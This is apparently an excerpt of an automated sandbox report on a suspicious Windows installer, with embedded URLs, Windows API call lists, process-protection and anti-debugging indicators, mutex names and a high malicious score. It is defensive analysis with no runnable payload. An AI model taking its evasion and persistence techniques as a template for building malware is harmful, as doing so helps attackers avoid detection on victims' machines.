Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73886
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F8810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C0F8810
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0F9450
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73A6A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF739CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF739CF
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73D62
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73D18
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73C62
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF71950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6BF71950
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF74754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6BF74754
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF747546_2_6BF74754
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C2D8D126_2_6C2D8D12
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C244F0A6_2_6C244F0A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C2CB06F6_2_6C2CB06F
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F48606_2_6C0F4860
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C2638816_2_6C263881
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0FA1336_2_6C0FA133
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C207A466_2_6C207A46
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C27CB306_2_6C27CB30
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C159CE06_2_6C159CE0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A6D506_2_6C1A6D50
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1ACE806_2_6C1ACE80
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C12BEA16_2_6C12BEA1
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C145EC96_2_6C145EC9
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A18106_2_6C1A1810
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1BD9306_2_6C1BD930
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C12B9726_2_6C12B972
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1AC9F06_2_6C1AC9F0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A2A506_2_6C1A2A50
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A4AA06_2_6C1A4AA0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1B7AA06_2_6C1B7AA0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A0AD06_2_6C1A0AD0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C143B666_2_6C143B66
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C133BCA6_2_6C133BCA
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C14840A6_2_6C14840A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A55806_2_6C1A5580
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1B25C06_2_6C1B25C0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1AC6E06_2_6C1AC6E0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1CC7006_2_6C1CC700
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C12F7CF6_2_6C12F7CF
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1A30206_2_6C1A3020
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1B67506_2_6C1B6750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CE81EC10_2_00CE81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CBE00A10_2_00CBE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D281C010_2_00D281C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D222E010_2_00D222E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3824010_2_00D38240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3C3C010_2_00D3C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4230010_2_00D42300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D304C810_2_00D304C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0E49F10_2_00D0E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D225F010_2_00D225F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D166D010_2_00D166D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1A6A010_2_00D1A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1865010_2_00D18650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3E99010_2_00D3E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1C95010_2_00D1C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF094310_2_00CF0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D22A8010_2_00D22A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CFAB1110_2_00CFAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D26CE010_2_00D26CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D18C2010_2_00D18C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D34EA010_2_00D34EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D30E0010_2_00D30E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D2D08910_2_00D2D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D010AC10_2_00D010AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1D1D010_2_00D1D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D391C010_2_00D391C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D2518010_2_00D25180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1B18010_2_00D1B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0B12110_2_00D0B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3112010_2_00D31120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3D2C010_2_00D3D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3720010_2_00D37200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA53CF10_2_00CA53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3F3C010_2_00D3F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D053F310_2_00D053F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CCB3E410_2_00CCB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D2F3A010_2_00D2F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D354D010_2_00D354D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CED49610_2_00CED496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3D47010_2_00D3D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1741010_2_00D17410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D2F42010_2_00D2F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3F59910_2_00D3F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3155010_2_00D31550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA157210_2_00CA1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4351A10_2_00D4351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1F50010_2_00D1F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3353010_2_00D33530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D2D6A010_2_00D2D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF965210_2_00CF9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4360110_2_00D43601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA97CA10_2_00CA97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D377C010_2_00D377C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CB976610_2_00CB9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CCF8E010_2_00CCF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3D9E010_2_00D3D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1F91010_2_00D1F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CBBAC910_2_00CBBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF3AEF10_2_00CF3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D27AF010_2_00D27AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA1AA110_2_00CA1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CBBC9210_2_00CBBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D27C5010_2_00D27C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1FDF010_2_00D1FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D25E8010_2_00D25E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D25F8010_2_00D25F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00CA1E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00D3FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00CA28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: String function: 6C1C9F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: String function: 6C12C240 appears 31 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007F1DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamee4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000000.1674452844.0000000001089000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNamee4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamee4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeBinary or memory string: OriginalFileNamee4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@146/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0F9450
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00CA9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CB3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00CB3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00CA9252
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F8930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6C0F8930
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-TCRTM.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_03
